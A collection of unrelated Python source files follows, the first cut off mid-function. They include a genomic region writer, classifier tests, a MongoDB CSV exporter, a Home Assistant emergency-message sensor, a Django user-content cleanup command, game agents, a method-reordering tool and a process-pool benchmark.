    opener, mode, decode = open_comp(inputfile, True)
    regions = []
    with opener(inputfile, mode) as instream:
        for raw in instream:
            raw = decode(raw)
            if not raw or raw.startswith('#'):
                continue
            chrom, start, end = raw.split()[1:4]
            # check_bounds returns a false-y value when the chromosome is not
            # listed in the sizes file; out-of-bounds coordinates raise inside
            if not check_bounds(chrom, start, end, bounds, inputfile):
                continue
            # drop the leading UCSC bin column, keep all remaining fields
            regions.append(raw.strip().split('\t')[1:])
    assert regions, 'No regions read from file {}'.format(inputfile)
    regions.sort(key=lambda reg: (reg[0], int(reg[1]), int(reg[2])))
    # renumber the region names with the requested prefix, 1-based
    for num, reg in enumerate(regions, start=1):
        reg[3] = '{}_{}'.format(nprefix, num)
    opener, mode, _ = open_comp(outputfile, False)
    cgi_header = ['#chrom', 'start', 'end', 'name', 'length',
                  'cpgNum', 'gcNum', 'perCpg', 'perGc', 'obsExp']
    with opener(outputfile, mode) as outstream:
        writer = csv.writer(outstream, delimiter='\t')
        writer.writerow(cgi_header)
        writer.writerows(regions)
    return outputfile
|
# coding=utf-8
import pytest
from cla.learn.classifier import TraditionalClassifier
@pytest.fixture(scope="module")
def setup_classifier():
    """Module-scoped TraditionalClassifier built from the bundled test data."""
    return TraditionalClassifier(
        vector_model_path="cla/res/test/model.bin",
        training_data_path="cla/res/test/labeled_train.txt",
    )
def test_traditional_classifier(setup_classifier):
    """Smoke-test classify(): positive sample scores > 0, negative < 0."""
    result = setup_classifier.classify([[u"这样", u"的", u"好事", u"应该", u"多", u"搞"],
                                        [u"小偷", u"太", u"坏"]])
    # was a Python 2 `print result` statement — a SyntaxError under Python 3
    print(result)
    # NOTE(review): __sizeof__() is always > 0, so this assertion can never
    # fail; len(result) was probably intended.
    assert result.__sizeof__() > 0
    assert result[0] > 0
    assert result[1] < 0
def test_traditional_classifier_accuracy(setup_classifier):
    """Accuracy on the bundled test set must beat chance (0.5)."""
    result = setup_classifier.test_with(test_data_path="cla/res/test/labeled_test.txt")
    # was a Python 2 `print result` statement — a SyntaxError under Python 3
    print(result)
    assert result > 0.5
|
import csv
from pymongo import MongoClient
try:
from credentials import MONGOLAB_URL
except ImportError:
MONGOLAB_URL = 'mongodb://localhost:27017/naturalisations'
def export_csv(series_id):
    """Export all items of the given archive series from MongoDB to
    data/<series_id>.csv.

    :param series_id: identifier of the series whose items are exported
    """
    dbclient = MongoClient(MONGOLAB_URL)
    db = dbclient.get_default_database()
    # NOTE(review): 'wb' with csv.writer is Python 2 usage; under Python 3
    # this must be open(..., 'w', newline='') — confirm the target interpreter.
    with open('data/{}.csv'.format(series_id), 'wb') as csv_file:
        csv_writer = csv.writer(csv_file)
        # NOTE(review): this header has 10 columns, but each data row below
        # writes 11 values (a running index plus 10 fields), so every column
        # is shifted by one relative to the header — verify intent.
        csv_writer.writerow([
            'barcode',
            'series',
            'control_symbol',
            'title',
            'start_date',
            'end_date',
            'access_status',
            'location',
            'digitised_status',
            'digitised_pages'
        ])
        items = db.items.find({'series': series_id})
        # print len(list(items))
        for index, item in enumerate(items):
            csv_writer.writerow([
                index,
                item['identifier'],
                item['series'],
                item['control_symbol'],
                # collapse embedded newlines and double spaces in titles
                item['title'].replace('\n', ' ').replace('\r', '').replace('  ', ' '),
                item['contents_dates']['start_date'],
                item['contents_dates']['end_date'],
                item['access_status'],
                item['location'],
                item['digitised_status'],
                item['digitised_pages']
            ])
|
#
# Count of sum of digits using recursion
#
def sum_of_digits(count):
    """Return the sum of the decimal digits of *count* (0 for count <= 0).

    Recursive: last digit (count % 10) plus the digit sum of the rest.
    """
    if count <= 0:
        return 0
    # Floor division is required here: the original used `count / 10`, which
    # is float division in Python 3 — the argument never reaches 0 and the
    # recursion never terminates.
    return (count % 10) + sum_of_digits(count // 10)


count = 1234
print(sum_of_digits(count))
|
import logging
import voluptuous as vol
from homeassistant.components.sensor import PLATFORM_SCHEMA, SensorEntity
from homeassistant.const import (CONF_NAME)
import homeassistant.helpers.config_validation as cv
from .api import P2000Api
"""Start the logger"""
_LOGGER = logging.getLogger(__name__)
# Default entity name and configuration keys for the optional filters.
DEFAULT_NAME = "p2000"
CONF_GEMEENTEN = "gemeenten"
CONF_CAPCODES = "capcodes"
# Extend the base sensor schema: optional name plus optional lists of
# municipalities ("gemeenten") and capcodes to filter messages on.
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
    vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
    vol.Optional(CONF_GEMEENTEN): vol.All(cv.ensure_list, [cv.string]),
    vol.Optional(CONF_CAPCODES): vol.All(cv.ensure_list, [cv.string])
})
def setup_platform(hass, config, add_entities, discovery_info=None):
    """Set up the p2000 sensor platform from the YAML configuration."""
    name = config.get(CONF_NAME)
    # renamed from `filter`, which shadowed the builtin of the same name
    filters = {
        "gemeenten": config.get(CONF_GEMEENTEN),
        "capcodes": config.get(CONF_CAPCODES)
    }
    _LOGGER.info(filters)
    api = P2000Api()
    add_entities([P2000Sensor(api, name, filters)])
class P2000Sensor(SensorEntity):
    """Sensor exposing the latest P2000 emergency-services message."""

    def __init__(self, api, name, filter):
        """Initialize the sensor.

        :param api: P2000Api instance used to fetch messages
        :param name: entity name shown in Home Assistant
        :param filter: dict with optional 'gemeenten'/'capcodes' lists
        """
        self.api = api
        self.attributes = {}
        self.filter = filter
        self._name = name
        self._state = None

    @property
    def name(self):
        """Return the name of the sensor."""
        return self._name

    @property
    def state(self):
        """Return the state of the sensor (id of the latest message)."""
        return self._state

    @property
    def extra_state_attributes(self):
        """Return the state attributes of the monitored installation."""
        attributes = self.attributes
        attributes['icon'] = 'mdi:fire-truck'
        return attributes

    def update(self):
        """Fetch new state data for the sensor.
        This is the only method that should fetch new data for Home Assistant.
        """
        data = self.api.get_data(self.filter)
        # `is None` instead of `== None`; keep the previous state when the
        # API returns nothing.
        if data is None:
            return
        self.attributes = data
        self._state = data["id"]
|
from .soc_psql import PSQLConfig
from .soc_psql_forward import PSQLForwardConfig
from .soc_preprocessed_seq import PreprocessedSeqConfig
from .soc_preprocessed_forward import PreprocessedForwardConfig
from .soc_preprocessed_text_forward import PreprocessedTextForwardConfig
from .soc_psql_text_seq import PSQLTextConfig
from .soc_psql_text_forward import PSQLTextForwardConfig
from .soc_file_text_seq import FileTextConfig
from .soc_file_text_forward import FileTextForwardConfig
from .soc_psql_seq import SocPSQLSeqDataset
from .soc_psql_seq import SocPSQLSeqSAToSDataset
from .soc_psql_seq import SocPSQLSeqSAToSADataset
from .soc_psql_forward import SocPSQLForwardSAToSADataset
from .soc_psql_forward import SocPSQLForwardSAToSAPolicyDataset
from .soc_preprocessed_seq import SocPreprocessedSeqSAToSDataset
from .soc_preprocessed_seq import SocPreprocessedSeqSAToSADataset
from .soc_preprocessed_seq import SocPreprocessedSeqSAToSAPolicyDataset
from .soc_preprocessed_forward import SocPreprocessedForwardSAToSADataset
from .soc_preprocessed_forward import SocPreprocessedForwardSAToSAPolicyDataset
from .soc_preprocessed_forward import SocLazyPreprocessedForwardSAToSADataset
from .soc_preprocessed_forward import SocLazyPreprocessedForwardSAToSAPolicyDataset
from .soc_psql_text_seq import SocPSQLTextBertSeqDataset
from .soc_psql_text_forward import SocPSQLTextBertForwardSAToSADataset
from .soc_psql_text_forward import SocPSQLTextBertForwardSAToSAPolicyDataset
from .soc_file_seq import SocFileSeqDataset
from .soc_file_text_seq import SocFileTextBertSeqDataset
from .soc_file_text_forward import SocFileTextBertForwardSAToSAPolicyDataset
from .soc_file_text_forward import SocFileTextBertHumanTradeForwardSAToSAPolicyDataset
from .soc_file_text_forward import SocFileTextBertTradeForwardSAToSAPolicyDataset
from .soc_preprocessed_text_forward import SocPreprocessedTextBertForwardSAToSADataset
from .soc_preprocessed_text_forward import SocPreprocessedTextBertForwardSAToSAPolicyDataset
# yapf: disable
# __all__ doubles as the dataset-name registry: make_dataset() and
# get_dataset_class() below resolve config.name against this list.
__all__ = [
    # Configurations
    'PSQLConfig',
    'PSQLForwardConfig',
    'PreprocessedSeqConfig',
    'PreprocessedForwardConfig',
    'PSQLTextConfig',
    'PSQLTextForwardConfig',
    'PreprocessedTextForwardConfig',
    'FileTextConfig',
    'FileTextForwardConfig',
    # Soc Datasets
    'SocPSQLSeqDataset',
    'SocPSQLSeqSAToSDataset',
    'SocPSQLSeqSAToSADataset',
    'SocPSQLForwardSAToSADataset',
    'SocPSQLForwardSAToSAPolicyDataset',
    'SocPreprocessedSeqSAToSDataset',
    'SocPreprocessedSeqSAToSADataset',
    'SocPreprocessedSeqSAToSAPolicyDataset',
    'SocPreprocessedForwardSAToSADataset',
    'SocPreprocessedForwardSAToSAPolicyDataset',
    'SocLazyPreprocessedForwardSAToSADataset',
    'SocLazyPreprocessedForwardSAToSAPolicyDataset',
    # Soc Dataset with text
    'SocPSQLTextBertSeqDataset',
    'SocPSQLTextBertForwardSAToSADataset',
    'SocPSQLTextBertForwardSAToSAPolicyDataset',
    'SocFileSeqDataset',
    'SocFileTextBertSeqDataset',
    'SocFileTextBertForwardSAToSAPolicyDataset',
    'SocFileTextBertHumanTradeForwardSAToSAPolicyDataset',
    'SocFileTextBertTradeForwardSAToSAPolicyDataset',
    'SocPreprocessedTextBertForwardSAToSADataset',
    'SocPreprocessedTextBertForwardSAToSAPolicyDataset',
]
# yapf: enable
def make_dataset(config):
    """Instantiate the dataset class named by ``config.name``.

    :param config: configuration object whose ``name`` selects one of the
        classes listed in ``__all__``
    :raises Exception: if ``config.name`` is not a known dataset name
    """
    # Delegate the lookup so the name->class resolution (and its error
    # message) lives in exactly one place instead of being duplicated here.
    dataset_class = get_dataset_class(config)
    return dataset_class(config)
def get_dataset_class(config):
    """Resolve ``config.name`` to the dataset/config class of that name.

    :param config: configuration object whose ``name`` must be in ``__all__``
    :raises Exception: when the name is unknown
    """
    if config.name not in __all__:
        raise Exception('The dataset name {} does not exist'.format(config.name))
    return globals()[config.name]
def get_datasets_list():
    """Return the names of all available dataset/config classes (``__all__``)."""
    return __all__
|
import django
__version__ = '3.10.0'
# Django 3.2+ discovers the AppConfig automatically (default_app_config is
# deprecated there), so only declare it for older Django versions.
if django.VERSION < (3, 2):
    default_app_config = 'cms.apps.CMSConfig'
|
#! /usr/bin/env python3
# -*- coding:utf-8 -*-
# from src.self import SelfEnum as self_enum
import gen_browser_header.self.SelfEnum as self_enum
import gen_browser_header.helper.Helper as helper
import datetime
# Chrome's first release was in 2008, so this is the number of release years
# available up to and including the current year.
CHROME_MAX_RELEASE_YEAR = datetime.date.today().year - 2008 + 1
class GbhSetting(object):
    """Configuration holder for browser header / user-agent generation."""

    # Windows versions to emulate when producing Windows user-agents:
    # 6.0 = Vista, 6.1 = Win7, 6.2 = Win8, 6.3 = Win8.1, 10.0 = Win10
    WIN_VER = ['Windows NT 6.0', 'Windows NT 6.1', 'Windows NT 6.2',
               'Windows NT 6.3', 'Windows NT 10.0']

    # _proxy_ip: None by default; when set, must be a list of proxy addresses
    #     used to reach sites that cannot be connected to directly.
    # _firefox_header_no_ua / _chrome_header_no_ua: header template dicts
    #     without a User-Agent; fill in a UA to obtain a complete header.
    # _browser_type: set of browsers to generate UAs for (firefox/chrome).
    # _firefox_ver: dict with 'min' and 'max' keys for Firefox versions.
    # _chrome_type: set of Chrome channels (stable/dev/canary/beta).
    # _chrome_max_release_year: int, how many years back Chrome releases go
    #     (older versions are not used).
    # _os_type: set of OS flavours for the UA (win32/win64).
    __slots__ = ('_proxy_ip', '_firefox_header_no_ua', '_chrome_header_no_ua',
                 '_browser_type', '_firefox_ver', '_chrome_type',
                 '_chrome_max_release_year', '_os_type')

    def __init__(self):
        self._proxy_ip = None
        self._firefox_header_no_ua = {
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
            # some sites return garbled bytes unless '*' is used here, even
            # when br/gzip would normally be acceptable
            'Accept-Encoding': '*',
            'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
            'Connection': 'keep-alive'}
        self._chrome_header_no_ua = {
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
            # same '*' workaround as for the Firefox template above
            'Accept-Encoding': '*',
            'Accept-Language': 'zh-CN,zh;q=0.9',
            'Connection': 'keep-alive'}
        self._browser_type = {self_enum.BrowserType.FireFox}
        self._firefox_ver = {'min': 64, 'max': 75}
        self._chrome_type = {self_enum.ChromeType.Stable}
        self._chrome_max_release_year = 2
        self._os_type = {self_enum.OsType.Win64}

    @property
    def proxies(self):
        """Proxy dicts derived from ``proxy_ip``; None when no proxies are set."""
        if self._proxy_ip is None:
            return None
        return [{'http': '%s' % ip, 'https': '%s' % ip} for ip in self._proxy_ip]

    @property
    def firefox_header_no_ua(self):
        return self._firefox_header_no_ua

    @firefox_header_no_ua.setter
    def firefox_header_no_ua(self, value):
        # the dict structure is not validated here
        self._firefox_header_no_ua = value

    @property
    def chrome_header_no_ua(self):
        return self._chrome_header_no_ua

    @chrome_header_no_ua.setter
    def chrome_header_no_ua(self, value):
        # the dict structure is not validated here
        self._chrome_header_no_ua = value

    @property
    def browser_type(self):
        return self._browser_type

    @browser_type.setter
    def browser_type(self, value):
        # enum_set_check returns None for invalid input; keep the old value then
        checked = helper.enum_set_check(value, self_enum.BrowserType)
        if checked is not None:
            self._browser_type = checked

    @property
    def proxy_ip(self):
        return self._proxy_ip

    # Chrome versions are scraped from https://www.chromedownloads.net/; when
    # that site cannot be reached directly, these proxies are tried instead.
    @proxy_ip.setter
    def proxy_ip(self, value):
        self._proxy_ip = value

    @property
    def firefox_ver(self):
        return self._firefox_ver

    @firefox_ver.setter
    def firefox_ver(self, value):
        # invalid input leaves the previous value untouched
        if not helper.match_expect_type(value, 'dict'):
            return
        if 'min' in value and helper.match_expect_type(value['min'], 'int'):
            self._firefox_ver['min'] = value['min']
        # +1 because range() excludes its upper bound when the versions are
        # expanded later: [range(74, 75)] => [74]
        if 'max' in value and helper.match_expect_type(value['max'], 'int'):
            self._firefox_ver['max'] = value['max'] + 1

    @property
    def chrome_type(self):
        return self._chrome_type

    @chrome_type.setter
    def chrome_type(self, value):
        # enum_set_check returns None for invalid input; keep the old value then
        checked = helper.enum_set_check(value, self_enum.ChromeType)
        if checked is not None:
            self._chrome_type = checked

    @property
    def chrome_max_release_year(self):
        return self._chrome_max_release_year

    @chrome_max_release_year.setter
    def chrome_max_release_year(self, value):
        # must be an int in [0, current year - 2008 + 1]; otherwise ignored
        if not helper.match_expect_type(value, 'int'):
            return
        if value < 0:
            return
        if CHROME_MAX_RELEASE_YEAR < value:
            return
        self._chrome_max_release_year = value

    @property
    def os_type(self):
        return self._os_type

    @os_type.setter
    def os_type(self, value):
        # enum_set_check returns None for invalid input; keep the old value then
        checked = helper.enum_set_check(value, self_enum.OsType)
        if checked is not None:
            self._os_type = checked
if __name__ == '__main__':
    # Manual smoke tests; the commented lines below exercise the individual
    # setters/properties and are kept as usage examples.
    # print(GbhSetting['WIN_VER'])
    st = GbhSetting()
    # st.browser_type = {self_enum.BrowserType.All}
    # print(st.browser_type)
    # st.chrome_type = {self_enum.ChromeType.All}
    # print(st.chrome_type)
    # st.chrome_type = {self_enum.ChromeType.Stable}
    # print(st.chrome_type)
    # st.os_type = {self_enum.OsType.All}
    # print(st.os_type)
    # st.os_type = {self_enum.OsType.Win32}
    # print(st.os_type)
    # print(st.proxy_ip)
    # print(st.proxies)
    # st.firefox_ver = {'min':72,'max':75}
    # print(st.firefox_ver)
    #
    # print(st.WIN_VER)
    # print(st.HEADER)
|
from django.core.management.base import BaseCommand, CommandError
from django_comments.models import Comment
from molo.profiles.models import UserProfile, SecurityAnswer
from molo.forms.models import MoloFormSubmission
from wagtail.core.models import Site
class Command(BaseCommand):
    help = ('Accepts site ids and removes associated users and '
            'user-generated content')
    # Dry-run by default; --commit switches to actually deleting.
    commit = False
    # Running totals across all processed sites.
    comment_count = 0
    submissions_count = 0
    sec_answer_count = 0

    def add_arguments(self, parser):
        """Register the positional site ids and the --commit flag."""
        parser.add_argument('site_ids', nargs='+', type=int)
        parser.add_argument(
            '--commit',
            action='store_true',
            help='Commit the changes rather than just showing them.',
        )

    def handle(self, *args, **options):
        """Process each site: count (and optionally delete) non-staff users
        and their comments, form submissions and security answers."""
        if options['commit']:
            self.commit = True
        for site_id in options['site_ids']:
            try:
                site = Site.objects.get(pk=site_id)
            except Site.DoesNotExist:
                raise CommandError('Site "%s" does not exist' % site_id)
            profiles = self.get_user_profiles(site)
            self.stdout.write(
                'Found %s profiles for site %s' % (profiles.count(), site_id))
            staff_count = 0
            for profile in profiles.iterator():
                # Don't delete anything for staff members
                if profile.user.is_staff or profile.user.is_superuser:
                    staff_count += 1
                    continue
                self.remove_comments(profile.user)
                self.remove_form_submissions(profile.user)
                self.remove_security_question_answers(profile)
                if self.commit:
                    # keep a reference: deleting the profile first avoids a
                    # dangling profile row once the user row is gone
                    user = profile.user
                    profile.delete()
                    user.delete()
            self.stdout.write('Found %s staff profiles' % staff_count)
            self.stdout.write('Found %s comments' % self.comment_count)
            self.stdout.write(
                'Found %s form submissions' % self.submissions_count)
            self.stdout.write(
                'Found %s security question answers' % self.sec_answer_count)
            if self.commit:
                self.stdout.write('All (non-staff) content deleted.')

    def get_user_profiles(self, site):
        """Return the queryset of user profiles belonging to *site*."""
        profiles = UserProfile.objects.filter(site=site)
        return profiles

    def remove_comments(self, user):
        """Count *user*'s comments and delete them when committing."""
        comments = Comment.objects.filter(user=user)
        self.comment_count += comments.count()
        if self.commit:
            comments.delete()

    def remove_form_submissions(self, user):
        """Count *user*'s form submissions and delete them when committing."""
        submissions = MoloFormSubmission.objects.filter(user=user)
        self.submissions_count += submissions.count()
        if self.commit:
            submissions.delete()

    def remove_security_question_answers(self, profile):
        """Count *profile*'s security answers and delete them when committing."""
        answers = SecurityAnswer.objects.filter(user=profile)
        self.sec_answer_count += answers.count()
        if self.commit:
            answers.delete()
|
import asyncio
import pytest
@pytest.fixture
def queue() -> asyncio.Queue:
    """Provide a fresh, empty asyncio.Queue for each test."""
    return asyncio.Queue()
|
import random
from abc import ABC, abstractmethod
from typing import Sequence, List
from .action import Action
from .states.game_state import GameState
class Agent(ABC):
    """Abstract interface for game-playing agents."""
    @abstractmethod
    def choose_action(self, state: GameState, possible_actions: Sequence[Action]) -> Action:
        """Select and return one action from *possible_actions* given *state*."""
        raise NotImplementedError
    def on_action_applied(self, action: Action, new_state: GameState):
        """Hook invoked after an action has been applied; default is a no-op."""
        pass
class RandomAgent(Agent):
    """Agent that picks uniformly at random from the available actions."""

    def choose_action(self, state: GameState, possible_actions: Sequence[Action]) -> Action:
        """Return one of *possible_actions*, chosen uniformly; *state* is ignored."""
        chosen = random.choice(possible_actions)
        return chosen
class RecordedAgent(Agent):
    """Agent that replays a pre-recorded sequence of actions in order."""

    actions: List[Action]

    def __init__(self, actions: List[Action]):
        super().__init__()
        self.actions = actions

    def choose_action(self, state: GameState, possible_actions: Sequence[Action]) -> Action:
        """Return (and consume) the next recorded action; *state* is ignored."""
        next_action = self.actions.pop(0)
        return next_action
class ConsoleAgent(Agent):
    """Agent driven interactively by a human via stdin/stdout."""

    def choose_action(self, state: GameState, possible_actions: Sequence[Action]) -> Action:
        """Print the numbered actions and prompt until a valid index is entered."""
        for number, candidate in enumerate(possible_actions):
            print(f"{number}: {candidate}")
        while True:
            try:
                choice = int(input())
            except ValueError as e:
                # non-numeric input: show the parse error and ask again
                print(e)
            else:
                # out-of-range numbers silently re-prompt, as before
                if 0 <= choice < len(possible_actions):
                    return possible_actions[choice]
|
import os
import shutil
import re
from pathlib import Path
from datetime import datetime
from dataclasses import dataclass
from typing import List
from loguru import logger
class FileStructure:
    """Parse a Python source file as raw text and index the methods of one
    class so they can be reordered in place.

    Assumes the target class's methods are indented by *indent* (default
    four spaces) and that method bodies are indented by ``indent * 2``.
    """
    def __init__(self, infile: str, klass: str, indent="    ") -> None:
        """Read *infile* and record, for class *klass*, the line ranges
        (klass_start/klass_end) and each method's name/start/end in self.funcs.
        """
        self.infile = infile
        with open(infile, "r") as f:
            self.lines = f.readlines()
        # detect where the class starts
        self.klass_start = 0
        for i, line in enumerate(self.lines):
            if line.startswith(f"class {klass}"):
                self.klass_start = i
                if line.find("(") != -1 and line.find(")") == -1:
                    # class is not closed: the base-class list spans several
                    # lines, so advance until the closing parenthesis.
                    while self.lines[self.klass_start].find(")") == -1:
                        self.klass_start += 1
                # move past the "class ...:" line to the first body line
                self.klass_start += 1
                break
        self.klass_end = len(self.lines)
        # the class ends at the first non-blank line not indented as its body
        for i in range(self.klass_start, len(self.lines)):
            if self.lines[i].strip() == "" or self.lines[i].startswith(indent):
                continue
            self.klass_end = i
            break
        self.funcs = []
        for i in range(self.klass_start, self.klass_end):
            line = self.lines[i]
            if line.startswith(f"{indent}def "):
                # this is where the function begin, look before and after.
                # Walk backwards over decorators/comments attached to the def
                # (lines at exactly one indent level, non-blank).
                func_start = i
                while True:
                    if self.lines[func_start - 1].strip() == "" or not (
                        self.lines[func_start - 1].startswith(indent)
                        and not self.lines[func_start - 1].startswith(indent * 2)
                    ):
                        break
                    func_start -= 1
                # detect if the function is not closed yet
                if re.match(rf"{indent}def [^(]+\([^)]*\n", line) is not None:
                    # the function is not closed yet: the signature spans
                    # multiple lines, so scan forward to the closing paren.
                    func_end = i + 1
                    while True:
                        if self.lines[func_end].find(")") != -1:
                            func_end += 1
                            break
                        func_end += 1
                else:
                    # single-line signature: the body runs while lines are
                    # blank or indented at least two levels deep.
                    func_end = i + 1
                    while func_end < len(self.lines):
                        if (
                            not self.lines[func_end].startswith(f"{indent}{indent}")
                            and self.lines[func_end].strip() != ""
                        ):
                            break
                        func_end += 1
                self.funcs.append(
                    {
                        "name": re.match(rf"{indent}def +([^(]+)\(", line).group(1),
                        "start": func_start,
                        "end": func_end,
                    }
                )
        # make sure it has some functions
        assert len(self.funcs) > 0
        # adjust the start & end of the class
        self.klass_start = min([x["start"] for x in self.funcs]) - 1
        self.klass_end = max([x["end"] for x in self.funcs])
    def reorder_funcs(self, new_order: List[str]) -> None:
        """Rewrite the file with the class's methods arranged in *new_order*.

        A timestamped backup of the original file is written first.
        Raises ValueError when *new_order* does not name exactly the
        discovered methods.
        """
        # current implementation works only for functions with empty lines between them
        used_lines = set()
        for func in self.funcs:
            for i in range(func["start"], func["end"]):
                used_lines.add(i)
        # every in-class line not owned by a method must be blank
        for i in range(self.klass_start + 1, self.klass_end):
            if i not in used_lines:
                assert self.lines[i].strip() == "", f"Line {i}: {self.lines[i]}"
        new_lines = self.lines[: self.klass_start + 1]
        funcs = {x["name"]: x for x in self.funcs}
        if set(funcs.keys()) != set(new_order):
            logger.error(
                "Missing functions: {}", set(funcs.keys()).difference(new_order)
            )
            logger.error("Extra functions: {}", set(new_order).difference(funcs.keys()))
            raise ValueError("Invalid order")
        for func in new_order:
            new_lines += self.lines[funcs[func]["start"] : funcs[func]["end"]]
            # re-insert the blank separator line between methods
            new_lines.append("\n")
        new_lines += self.lines[self.klass_end :]
        backup = f"{self.infile}.{datetime.now().isoformat()}"
        assert not os.path.exists(backup), backup
        shutil.copyfile(self.infile, backup)
        with open(self.infile, "w") as f:
            for line in new_lines:
                f.write(line)
    def sync_with(self, fs: "FileStructure") -> None:
        """Make your functions following the same order as in the other file.
        The functions that are not in the other file are put at the bottom"""
        old_order = [x["name"] for x in self.funcs]
        new_order = []
        # keep __init__ first if only this file has one
        if self.has_func("__init__") and not fs.has_func("__init__"):
            new_order.append("__init__")
            old_order.pop(old_order.index("__init__"))
        for func in fs.funcs:
            if func["name"] not in old_order:
                continue
            new_order.append(func["name"])
            old_order.pop(old_order.index(func["name"]))
        # leftovers (methods unique to this file) go at the bottom
        new_order += old_order
        assert len(new_order) == len(self.funcs)
        self.reorder_funcs(new_order)
    def has_func(self, name: str):
        """Return True when a method called *name* was discovered."""
        return any(name == x["name"] for x in self.funcs)
if __name__ == "__main__":
    # Ad-hoc driver: reorder the retworkx string-digraph implementation to
    # match the method order of the IGraph interface. Paths are hard-coded
    # to a specific workspace layout.
    fs = FileStructure("/workspace/sm-dev/graph/graph/interface.py", "IGraph")
    fs2 = FileStructure(
        "/workspace/sm-dev/graph/graph/retworkx/digraph.py", "_RetworkXDiGraph"
    )
    fs3 = FileStructure(
        "/workspace/sm-dev/graph/graph/retworkx/str_digraph.py", "RetworkXStrDiGraph"
    )
    # fs2.sync_with(fs)
    fs3.sync_with(fs)
    # print(len(fs.funcs))
    # print([f["name"] for f in fs.funcs])
    # fs.reorder_funcs(
    #     [
    #         "num_nodes",
    #         "nodes",
    #         "iter_nodes",
    #         "filter_nodes",
    #         "iter_filter_nodes",
    #         "has_node",
    #         "get_node",
    #         "add_node",
    #         "remove_node",
    #         "update_node",
    #         "find_node",
    #         "degree",
    #         "in_degree",
    #         "out_degree",
    #         "successors",
    #         "predecessors",
    #         "num_edges",
    #         "edges",
    #         "iter_edges",
    #         "filter_edges",
    #         "iter_filter_edges",
    #         "has_edge",
    #         "get_edge",
    #         "add_edge",
    #         "update_edge",
    #         "remove_edge",
    #         "remove_edge_between_nodes",
    #         "remove_edges_between_nodes",
    #         "has_edge_between_nodes",
    #         "has_edges_between_nodes",
    #         "get_edge_between_nodes",
    #         "get_edges_between_nodes",
    #         "in_edges",
    #         "out_edges",
    #         "group_in_edges",
    #         "group_out_edges",
    #         "subgraph_from_edges",
    #         "subgraph_from_edge_triples",
    #         "copy",
    #         "check_integrity",
    #     ]
    # )
    # print([x["name"] for x in fs2.funcs])
|
__author__ = 'wanderknight'
__time__ = '2019/8/9 20:31'
from django.conf.urls import url
from ..views.oj import ClassgroupAPI
urlpatterns = [
    # Class-group API endpoint; the trailing slash is optional.
    url(r"^classgroups/?$", ClassgroupAPI.as_view(), name="classgroup_api"),
]
|
import sys
import time
import fastprocesspool_debug as fastprocesspool
from multiprocessing.pool import Pool
if sys.version_info[0] > 2:
from concurrent.futures import ProcessPoolExecutor
import zstd
import msgpack
class TestValues(object):
    """Benchmark: push single integer values through several process-pool
    implementations and sum the returned results.

    Compares fastprocesspool against multiprocessing.pool.Pool and
    concurrent.futures.ProcessPoolExecutor; run() prints one timing row
    per strategy.
    """
    def __init__(self):
        self.result = 0         # accumulated sum of worker results
        self.worker = None      # bound by test() to worker_cb
        self.worker_gen = None  # bound by test() to worker_gen_cb
    def worker_cb(self, data):
        # Identity worker: the benchmark measures pool overhead, not work.
        #print("worker_cb", data)
        return data
    def worker_gen_cb(self, data):
        # Generator flavour of the identity worker (for imap).
        yield data
    def failed_cb(self, exc):
        print(exc)
    def result_cb(self, result):
        #print("result_cb", result)
        self.result += result
    def results_cb(self, results):
        # Callback receiving the whole result list at once (map_async).
        self.result += sum(results)
    def result_future_cb(self, result):
        # concurrent.futures done-callback: unwrap the Future first.
        self.result += result.result()
    # --- fastprocesspool strategies ---
    def map(self, data):
        pool = fastprocesspool.Pool()
        pool.map(self.worker, data)
        pool.shutdown()
        self.result = sum(pool.done)
    def map_no_done(self, data):
        # Third argument False: do not collect results in pool.done.
        pool = fastprocesspool.Pool()
        pool.map(self.worker, data, False)
        pool.shutdown()
    def map_done_cb(self, data):
        with fastprocesspool.Pool(done_callback = self.result_cb) as pool:
            pool.map(self.worker, data)
    def map_failed_cb(self, data):
        pool = fastprocesspool.Pool(failed_callback = self.failed_cb)
        pool.map(self.worker, data)
        pool.shutdown()
        self.result = sum(pool.done)
    def imap(self, data):
        pool = fastprocesspool.Pool()
        pool.imap(self.worker_gen, data)
        pool.shutdown()
        self.result = sum(pool.done)
    def imap_done_cb(self, data):
        with fastprocesspool.Pool(done_callback = self.result_cb) as pool:
            pool.imap(self.worker_gen, data)
    def imap_failed_cb(self, data):
        pool = fastprocesspool.Pool(failed_callback = self.failed_cb)
        pool.imap(self.worker_gen, data)
        pool.shutdown()
        self.result = sum(pool.done)
    def submit(self, data):
        pool = fastprocesspool.Pool()
        for value in data:
            pool.submit(self.worker, value)
        pool.shutdown()
        self.result = sum(pool.done)
    def submit_pool_done_cb(self, data):
        with fastprocesspool.Pool(done_callback = self.result_cb) as pool:
            for value in data:
                pool.submit(self.worker, value)
    def submit_pool_failed_cb(self, data):
        pool = fastprocesspool.Pool(failed_callback = self.failed_cb)
        for value in data:
            pool.submit(self.worker, value)
        pool.shutdown()
        self.result = sum(pool.done)
    def submit_done_cb(self, data):
        # Per-task done callback instead of a pool-wide one.
        with fastprocesspool.Pool() as pool:
            for value in data:
                pool.submit_done(self.worker, self.result_cb, value)
    # --- multiprocessing.pool.Pool strategies ---
    def Pool_map(self, data):
        pool = Pool()
        results = pool.map(self.worker, data)
        pool.close()
        pool.join()
        self.result = sum(results)
    def Pool_map_async_done_cb(self, data):
        pool = Pool()
        pool.map_async(self.worker, data, callback = self.results_cb)
        pool.close()
        pool.join()
    def Pool_apply_async_done_cb(self, data):
        pool = Pool()
        for value in data:
            pool.apply_async(self.worker, ( value, ), callback = self.result_cb)
        pool.close()
        pool.join()
    # --- concurrent.futures strategies ---
    def ProcessPoolExecutor_map(self, data):
        pool = ProcessPoolExecutor()
        results = pool.map(self.worker, data)
        pool.shutdown()
        self.result = sum(results)
    def ProcessPoolExecutor_submit_done_cb(self, data):
        pool = ProcessPoolExecutor()
        for value in data:
            future = pool.submit(self.worker, value)
            future.add_done_callback(self.result_future_cb)
        pool.shutdown()
    def test(self, test_cb, data):
        # Reset state, bind the workers, time one strategy by name, print a row.
        self.result = 0
        self.worker = self.worker_cb
        self.worker_gen = self.worker_gen_cb
        t = time.time()
        getattr(self, test_cb)(data)
